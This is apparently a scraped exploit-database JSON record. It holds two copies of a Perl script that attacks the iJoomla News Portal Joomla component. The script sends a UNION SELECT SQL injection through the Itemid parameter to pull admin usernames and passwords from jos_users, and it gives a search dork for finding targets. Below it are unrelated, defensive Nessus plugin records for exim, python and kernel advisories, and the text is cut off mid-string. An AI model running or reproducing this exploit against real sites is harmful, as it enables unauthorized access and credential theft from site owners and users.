{"published": "2008-06-09T00:00:00", "id": "1337DAY-ID-3134", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [{"differentElements": ["sourceHref", "sourceData", "href"], "edition": 1, "lastseen": "2016-04-20T00:39:10", "bulletin": {"published": "2008-06-09T00:00:00", "id": "1337DAY-ID-3134", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [], "enchantments": {"score": {"value": 6.4, "modified": "2016-04-20T00:39:10"}}, "hash": "4e9e53754428dec92bda58337b8758c001cd4ba08c3147001164a38c7a4a2994", "description": "Exploit for unknown platform in category web applications", "type": "zdt", "lastseen": "2016-04-20T00:39:10", "edition": 1, "title": "iJoomla News Portal (Itemid) Remote SQL Injection Exploit", "href": "http://0day.today/exploit/description/3134", "modified": "2008-06-09T00:00:00", "bulletinFamily": "exploit", "viewCount": 0, "cvelist": [], "sourceHref": "http://0day.today/exploit/3134", "references": [], "reporter": "ilker Kandemir", "sourceData": "=========================================================\r\niJoomla News Portal (Itemid) Remote SQL Injection Exploit\r\n=========================================================\r\n\r\n\r\n\r\n#!/usr/bin/perl\r\n#[[Script Name: Joomla Component News Portal <= 1.0 Blind SQL Injection Exploit\r\n#[[Coded by : MEFISTO\r\n#[[Author : ilker Kandemir\r\n#[[Dork : \"index.php?option=com_news_portal\" or \"Powered by iJoomla News Portal\"\r\n\r\nuse IO::Socket;\r\nif(@ARGV < 1){\r\nprint \"\r\n[[========================================================================\r\n[[// Joomla Component News Portal <= 1.0 Blind SQL Injection Exploit\r\n[[// Usage: cnp.pl [target]\r\n[[// Example: cnp.pl victim.com\r\n[[// Vuln&Exp : iLker Kandemir a.k.a MEFISTO\r\n[[========================================================================\r\n\";\r\nexit();\r\n}\r\n#Local variables\r\n$server = $ARGV[0];\r\n$server =~ s/(http:\\/\\/)//eg;\r\n$host = \"http://\".$server;\r\n$port = \"80\";\r\n$file = \"/index.php?option=com_news_portal&Itemid=\";\r\n\r\nprint \"Script <DIR> : \";\r\n$dir = <STDIN>;\r\nchop ($dir);\r\n\r\nif ($dir =~ /exit/){\r\nprint \"-- Exploit Failed[You Are Exited] \\n\";\r\nexit();\r\n}\r\n\r\nif ($dir =~ /\\//){}\r\nelse {\r\nprint \"-- Exploit Failed[No DIR] \\n\";\r\nexit();\r\n }\r\n\r\n\r\n$target = \"-1%20union%20select%20111,concat(char(117,115,101,114,110,97,109,101,58),username,char(112,97,115,115,119,111,114,100,58),password),333%20from%20jos_users/*\";\r\n$target = $host.$dir.$file.$target;\r\n\r\n#Writing data to socket\r\nprint \"+**********************************************************************+\\n\";\r\nprint \"+ Trying to connect: $server\\n\";\r\n$socket = IO::Socket::INET->new(Proto => \"tcp\", PeerAddr => \"$server\", PeerPort => \"$port\") || die \"\\n+ Connection failed...\\n\";\r\nprint $socket \"GET $target HTTP/1.1\\n\";\r\nprint $socket \"Host: $server\\n\";\r\nprint $socket \"Accept: */*\\n\";\r\nprint $socket \"Connection: close\\n\\n\";\r\nprint \"+ Connected!...\\n\";\r\n#Getting\r\nwhile($answer = <$socket>) {\r\nif ($answer =~ /username:(.*?)pass/){\r\nprint \"+ Exploit succeed! Getting admin information.\\n\";\r\nprint \"+ ---------------- +\\n\";\r\nprint \"+ Username: $1\\n\";\r\n}\r\n\r\nif ($answer =~ /password:(.*?)border/){\r\nprint \"+ Password: $1\\n\";\r\n}\r\n\r\nif ($answer =~ /Syntax error/) {\r\nprint \"+ Exploit Failed : ( \\n\";\r\nprint \"+**********************************************************************+\\n\";\r\nexit();\r\n}\r\n\r\nif ($answer =~ /Internal Server Error/) {\r\nprint \"+ Exploit Failed : ( \\n\";\r\nprint \"+**********************************************************************+\\n\";\r\nexit();\r\n}\r\n\r\n\r\n\r\n\n# 0day.today [2016-04-19] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "53930cfe32f10544de856569b3ae7e5b", "key": "title"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "713ffd1cd31f335104d6c8a754585a1f", "key": "sourceHref"}, {"hash": "46c9e9bcf40d12862b4e08b3f2610df9", "key": "href"}, {"hash": "8dd7f111a1d3a83662e517bc661b01ad", "key": "sourceData"}, {"hash": "e76e1d4fc01821b3ca4a0b53f3696cc6", "key": "reporter"}, {"hash": "00157601768b634735774d15ccd18f9e", "key": "description"}, {"hash": "9cff6a9ba25b9dbc0405946db1b22c53", "key": "published"}, {"hash": "9cff6a9ba25b9dbc0405946db1b22c53", "key": "modified"}], "objectVersion": "1.0"}}], "description": "Exploit for unknown platform in category web applications", "hash": "292aa1b63a773b5d8331d95fb244ea835e495fd39603813139aac26cfbe34766", "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "dependencies": {"references": [{"type": "zdt", "idList": ["1337DAY-ID-27673", "1337DAY-ID-25862", "1337DAY-ID-25377"]}, {"type": "cve", "idList": ["CVE-2016-3134"]}, {"type": "nessus", "idList": ["FEDORA_2016-81FD1B03AA.NASL", "FEDORA_2016-02ED08BF15.NASL", "FEDORA_2016-3A57B19360.NASL", "UBUNTU_USN-2930-3.NASL", "UBUNTU_USN-2929-1.NASL", "UBUNTU_USN-2930-1.NASL", "UBUNTU_USN-2929-2.NASL", "UBUNTU_USN-2930-2.NASL", "GENTOO_GLSA-201507-13.NASL", "SUSE_SU-2015-1211-1.NASL"]}, {"type": "suse", "idList": ["SUSE-SU-2015:1214-1", "SUSE-SU-2015:1211-1"]}], "modified": "2018-01-10T01:08:14"}, "vulnersScore": 7.5}, "type": "zdt", "lastseen": "2018-01-10T01:08:14", "edition": 2, "title": "iJoomla News Portal (Itemid) Remote SQL Injection Exploit", "href": "https://0day.today/exploit/description/3134", "modified": "2008-06-09T00:00:00", "bulletinFamily": "exploit", "viewCount": 3, "cvelist": [], "sourceHref": "https://0day.today/exploit/3134", "references": [], "reporter": "ilker Kandemir", "sourceData": "=========================================================\r\niJoomla News Portal (Itemid) Remote SQL Injection Exploit\r\n=========================================================\r\n\r\n\r\n\r\n#!/usr/bin/perl\r\n#[[Script Name: Joomla Component News Portal <= 1.0 Blind SQL Injection Exploit\r\n#[[Coded by : MEFISTO\r\n#[[Author : ilker Kandemir\r\n#[[Dork : \"index.php?option=com_news_portal\" or \"Powered by iJoomla News Portal\"\r\n\r\nuse IO::Socket;\r\nif(@ARGV < 1){\r\nprint \"\r\n[[========================================================================\r\n[[// Joomla Component News Portal <= 1.0 Blind SQL Injection Exploit\r\n[[// Usage: cnp.pl [target]\r\n[[// Example: cnp.pl victim.com\r\n[[// Vuln&Exp : iLker Kandemir a.k.a MEFISTO\r\n[[========================================================================\r\n\";\r\nexit();\r\n}\r\n#Local variables\r\n$server = $ARGV[0];\r\n$server =~ s/(http:\\/\\/)//eg;\r\n$host = \"http://\".$server;\r\n$port = \"80\";\r\n$file = \"/index.php?option=com_news_portal&Itemid=\";\r\n\r\nprint \"Script <DIR> : \";\r\n$dir = <STDIN>;\r\nchop ($dir);\r\n\r\nif ($dir =~ /exit/){\r\nprint \"-- Exploit Failed[You Are Exited] \\n\";\r\nexit();\r\n}\r\n\r\nif ($dir =~ /\\//){}\r\nelse {\r\nprint \"-- Exploit Failed[No DIR] \\n\";\r\nexit();\r\n }\r\n\r\n\r\n$target = \"-1%20union%20select%20111,concat(char(117,115,101,114,110,97,109,101,58),username,char(112,97,115,115,119,111,114,100,58),password),333%20from%20jos_users/*\";\r\n$target = $host.$dir.$file.$target;\r\n\r\n#Writing data to socket\r\nprint \"+**********************************************************************+\\n\";\r\nprint \"+ Trying to connect: $server\\n\";\r\n$socket = IO::Socket::INET->new(Proto => \"tcp\", PeerAddr => \"$server\", PeerPort => \"$port\") || die \"\\n+ Connection failed...\\n\";\r\nprint $socket \"GET $target HTTP/1.1\\n\";\r\nprint $socket \"Host: $server\\n\";\r\nprint $socket \"Accept: */*\\n\";\r\nprint $socket \"Connection: close\\n\\n\";\r\nprint \"+ Connected!...\\n\";\r\n#Getting\r\nwhile($answer = <$socket>) {\r\nif ($answer =~ /username:(.*?)pass/){\r\nprint \"+ Exploit succeed! Getting admin information.\\n\";\r\nprint \"+ ---------------- +\\n\";\r\nprint \"+ Username: $1\\n\";\r\n}\r\n\r\nif ($answer =~ /password:(.*?)border/){\r\nprint \"+ Password: $1\\n\";\r\n}\r\n\r\nif ($answer =~ /Syntax error/) {\r\nprint \"+ Exploit Failed : ( \\n\";\r\nprint \"+**********************************************************************+\\n\";\r\nexit();\r\n}\r\n\r\nif ($answer =~ /Internal Server Error/) {\r\nprint \"+ Exploit Failed : ( \\n\";\r\nprint \"+**********************************************************************+\\n\";\r\nexit();\r\n}\r\n\r\n\r\n\r\n\n# 0day.today [2018-01-09] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "00157601768b634735774d15ccd18f9e", "key": "description"}, {"hash": "f8a9d16fd925094ae1e30b4157b3fe9a", "key": "href"}, {"hash": "9cff6a9ba25b9dbc0405946db1b22c53", "key": "modified"}, {"hash": "9cff6a9ba25b9dbc0405946db1b22c53", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "e76e1d4fc01821b3ca4a0b53f3696cc6", "key": "reporter"}, {"hash": "5f3809d76badf3e0ba0e921ff2140ec8", "key": "sourceData"}, {"hash": "a080cc19a8c0e89f61a1e6c4c0117703", "key": "sourceHref"}, {"hash": "53930cfe32f10544de856569b3ae7e5b", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "objectVersion": "1.3"}

{"nessus": [{"lastseen": "2018-04-21T13:45:37", "bulletinFamily": "scanner", "description": "This is an update fixeing dec64table OOB read in b64decode.", "modified": "2018-04-20T00:00:00", "published": "2018-04-20T00:00:00", "href": "https://www.tenable.com/plugins/index.php?view=single&id=109186", "id": "ALA_ALAS-2018-997.NASL", "title": "Amazon Linux AMI : exim (ALAS-2018-997)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2018-997.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(109186);\n script_version(\"1.1\");\n script_cvs_date(\"Date: 2018/04/20 11:38:50\");\n\n script_xref(name:\"ALAS\", value:\"2018-997\");\n\n script_name(english:\"Amazon Linux AMI : exim (ALAS-2018-997)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\"This is an update fixeing dec64table OOB read in b64decode.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2018-997.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update exim' to update your system.\"\n );\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:exim\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:exim-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:exim-greylist\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:exim-mon\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:exim-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:exim-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/04/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/04/20\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"exim-4.90.1-3.15.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"exim-debuginfo-4.90.1-3.15.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"exim-greylist-4.90.1-3.15.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"exim-mon-4.90.1-3.15.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"exim-mysql-4.90.1-3.15.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"exim-pgsql-4.90.1-3.15.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"exim / exim-debuginfo / exim-greylist / exim-mon / exim-mysql / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-02-21T01:30:31", "bulletinFamily": "scanner", "description": "According to the versions of the python packages installed, the EulerOS installation on the remote host is affected by the following vulnerabilities :\n\n - It was discovered that the Python CGIHandler class did not properly protect against the HTTP_PROXY variable name clash in a CGI context. A remote attacker could possibly use this flaw to redirect HTTP requests performed by a Python CGI script to an attacker-controlled proxy via a malicious HTTP request.\n (CVE-2016-1000110)\n\n - It was found that Python's smtplib library did not return an exception when StartTLS failed to be established in the SMTP.starttls() function. A man in the middle attacker could strip out the STARTTLS command without generating an exception on the Python SMTP client application, preventing the establishment of the TLS layer. (CVE-2016-0772)\n\n - It was found that the Python's httplib library (used by urllib, urllib2 and others) did not properly check HTTPConnection.putheader() function arguments. An attacker could use this flaw to inject additional headers in a Python application that allowed user provided header names or values. (CVE-2016-5699)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "modified": "2018-11-14T00:00:00", "id": "EULEROS_SA-2016-1036.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=99799", "published": "2017-05-01T00:00:00", "title": "EulerOS 2.0 SP1 : python (EulerOS-SA-2016-1036)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(99799);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2018/11/14 14:36:22\");\n\n script_cve_id(\n \"CVE-2016-0772\",\n \"CVE-2016-1000110\",\n \"CVE-2016-5699\"\n );\n\n script_name(english:\"EulerOS 2.0 SP1 : python (EulerOS-SA-2016-1036)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the python packages installed, the\nEulerOS installation on the remote host is affected by the following\nvulnerabilities :\n\n - It was discovered that the Python CGIHandler class did\n not properly protect against the HTTP_PROXY variable\n name clash in a CGI context. A remote attacker could\n possibly use this flaw to redirect HTTP requests\n performed by a Python CGI script to an\n attacker-controlled proxy via a malicious HTTP request.\n (CVE-2016-1000110)\n\n - It was found that Python's smtplib library did not\n return an exception when StartTLS failed to be\n established in the SMTP.starttls() function. A man in\n the middle attacker could strip out the STARTTLS\n command without generating an exception on the Python\n SMTP client application, preventing the establishment\n of the TLS layer. (CVE-2016-0772)\n\n - It was found that the Python's httplib library (used by\n urllib, urllib2 and others) did not properly check\n HTTPConnection.putheader() function arguments. An\n attacker could use this flaw to inject additional\n headers in a Python application that allowed user\n provided header names or values. (CVE-2016-5699)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huawei.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2016-1036\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0db40b87\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected python packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/08/18\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:python\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:python-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:python-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(1)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP1\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP1\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\n\nflag = 0;\n\npkgs = [\"python-2.7.5-38\",\n \"python-devel-2.7.5-38\",\n \"python-libs-2.7.5-38\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"1\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"python\");\n}\n", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:NONE/"}}, {"lastseen": "2019-02-21T01:30:31", "bulletinFamily": "scanner", "description": "According to the versions of the kernel packages installed, the EulerOS installation on the remote host is affected by the following vulnerabilities :\n\n - The netfilter subsystem in the Linux kernel through 4.5.2 does not validate certain offset fields, which allows local users to gain privileges or cause a denial of service (heap memory corruption) via an IPT_SO_SET_REPLACE setsockopt call.(CVE-2016-3134)\n\n - The compat IPT_SO_SET_REPLACE and IP6T_SO_SET_REPLACE setsockopt implementations in the netfilter subsystem in the Linux kernel before 4.6.3 allow local users to gain privileges or cause a denial of service (memory corruption) by leveraging in-container root access to provide a crafted offset value that triggers an unintended decrement.(CVE-2016-4997)\n\n - The IPT_SO_SET_REPLACE setsockopt implementation in the netfilter subsystem in the Linux kernel before 4.6 allows local users to cause a denial of service (out-of-bounds read) or possibly obtain sensitive information from kernel heap memory by leveraging in-container root access to provide a crafted offset value that leads to crossing a ruleset blob boundary.(CVE-2016-4998)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "modified": "2019-02-19T00:00:00", "id": "EULEROS_SA-2016-1048.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=99811", "published": "2017-05-01T00:00:00", "title": "EulerOS 2.0 SP1 : kernel (EulerOS-SA-2016-1048)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(99811);\n script_version(\"1.43\");\n script_cvs_date(\"Date: 2019/02/19 9:39:25\");\n\n script_cve_id(\n \"CVE-2016-3134\",\n \"CVE-2016-4997\",\n \"CVE-2016-4998\"\n );\n\n script_name(english:\"EulerOS 2.0 SP1 : kernel (EulerOS-SA-2016-1048)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the kernel packages installed, the\nEulerOS installation on the remote host is affected by the following\nvulnerabilities :\n\n - The netfilter subsystem in the Linux kernel through\n 4.5.2 does not validate certain offset fields, which\n allows local users to gain privileges or cause a denial\n of service (heap memory corruption) via an\n IPT_SO_SET_REPLACE setsockopt call.(CVE-2016-3134)\n\n - The compat IPT_SO_SET_REPLACE and IP6T_SO_SET_REPLACE\n setsockopt implementations in the netfilter subsystem\n in the Linux kernel before 4.6.3 allow local users to\n gain privileges or cause a denial of service (memory\n corruption) by leveraging in-container root access to\n provide a crafted offset value that triggers an\n unintended decrement.(CVE-2016-4997)\n\n - The IPT_SO_SET_REPLACE setsockopt implementation in the\n netfilter subsystem in the Linux kernel before 4.6\n allows local users to cause a denial of service\n (out-of-bounds read) or possibly obtain sensitive\n information from kernel heap memory by leveraging\n in-container root access to provide a crafted offset\n value that leads to crossing a ruleset blob\n boundary.(CVE-2016-4998)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huawei.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2016-1048\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0fa65bc1\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected kernel packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Linux Kernel 4.6.3 Netfilter Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/10/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/01\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-debuginfo-common-x86_64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(1)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP1\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP1\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\n\nflag = 0;\n\npkgs = [\"kernel-3.10.0-229.42.1.93\",\n \"kernel-debug-3.10.0-229.42.1.93\",\n \"kernel-debuginfo-3.10.0-229.42.1.93\",\n \"kernel-debuginfo-common-x86_64-3.10.0-229.42.1.93\",\n \"kernel-devel-3.10.0-229.42.1.93\",\n \"kernel-headers-3.10.0-229.42.1.93\",\n \"kernel-tools-3.10.0-229.42.1.93\",\n \"kernel-tools-libs-3.10.0-229.42.1.93\",\n \"perf-3.10.0-229.42.1.93\",\n \"python-perf-3.10.0-229.42.1.93\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"1\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:29:50", "bulletinFamily": "scanner", "description": "It was discovered that there was a TLS stripping vulnerability in the smptlib library distributed with 